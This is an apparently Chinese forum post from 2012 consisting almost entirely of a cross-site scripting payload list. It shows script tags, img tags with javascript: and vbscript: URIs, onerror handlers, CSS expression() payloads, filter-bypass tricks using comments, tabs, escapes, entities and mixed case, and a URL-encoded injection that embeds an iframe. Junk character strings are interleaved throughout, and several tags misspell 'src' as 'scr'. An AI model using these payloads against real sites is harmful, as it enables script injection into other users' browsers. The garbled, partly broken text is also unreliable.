<script>alert("跨站")</script> (最常用)
: P/ h+ H2 j) X, \' x<img scr=javascript:alert("跨站")></img>: ?2 o) ^6 `9 T. D2 Y' B
<img scr="javascript: alert(/跨站/)></img>! e7 b& h1 W0 c( b( `4 l; N
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
/ f( H: A6 s \- G' Z+ ]<img scr="#" onerror=alert(/跨站/)></img>
& A9 R. F! j; ?# Y& o- p( p" w<img scr="#" style="xss:expression(alert(/xss/));"></img>
& z( Y* ]0 G9 T; F7 Q7 j* v3 e<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)# z7 o% O) g+ v
<img src=vbscript:msgbox ("xss")></img>
( r/ H3 C* e) _$ T; C<style> input {left:expression (alert('xss'))}</style>
$ ^* o0 H" O8 B S; h- n<div style={left:expression (alert('xss'))}></div>
' l2 T8 [, ]$ `( j<div style={left:exp/* */ression (alert('xss'))}></div>. F. \# Q9 X% s: w1 ~" j7 N. d2 ^0 ?
<div style={left:\0065\0078ression (alert('xss'))}></div>
) e6 x: i5 @, \# `* A* }* F8 shtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>: P9 b0 p" g0 Q$ v* {9 {4 ]$ c
unicode <div style="{left:expRessioN (alert('xss'))}">* o0 M, j$ P, i2 d
5 Q% g4 K- c6 n, {; f
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
& s0 T! F8 X b) c" \/ I: g |
发表于 2012-9-13 17:15:04
收藏
支持
反对